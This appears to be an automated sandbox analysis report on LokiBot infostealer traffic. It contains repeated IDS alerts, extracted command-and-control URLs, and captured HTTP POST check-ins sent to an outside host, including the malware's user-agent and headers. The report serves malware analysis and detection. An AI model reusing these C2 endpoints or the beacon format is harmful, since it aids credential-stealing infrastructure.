                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49788 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49788 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49788 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49788 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49788
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62643 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49791 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49791
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52089 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49795 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49795
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52698 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49797 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49797
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61901 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49799 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49799
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50081 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49804 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49804
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49520 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49806 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49806
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53049 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49808 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49808 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49808 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49808 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49808 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49808
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52125 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49811 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49811 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49811 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49811 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49811 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49811
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63104 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49812 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49812
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55083 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49813 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49813 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49813 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49813 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49813 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49813
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58360 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49814 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49814
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59724 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49816 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49816 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49816 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49816 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49816 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49816
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59106 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49818 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49818
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60658 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49820 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49820
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65367 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49823 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49823 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49823 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49823 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49823 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49823
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64579 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49832 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49832 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49832 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49832 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49832 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49832
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49463 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49846 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49846 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49846 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49846 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49846 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49846
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64150 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49860 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49860 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49860 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49860 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49860 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49860
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52328 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49869 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49869 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49869 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49869 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49869 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49869
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57422 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49876 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49876 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49876 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49876 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49876 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49876
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63844 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49880 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49880 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49880 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49880 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49880 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49880
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57269 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49881 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49881 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49881 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49881 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49881 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49881
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51645 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49883 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49883 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49883 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49883 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49883 -> 45.11.26.144:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.11.26.144:80 -> 192.168.2.6:49883
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://sempersim.su/gi4/fre.php
                Source: Joe Sandbox ViewASN Name: RETN-ASEU RETN-ASEU
                Source: Joe Sandbox ViewIP Address: 45.11.26.144 45.11.26.144
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 196Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 196Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /gi4/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA29FF80Content-Length: 169Connection: close
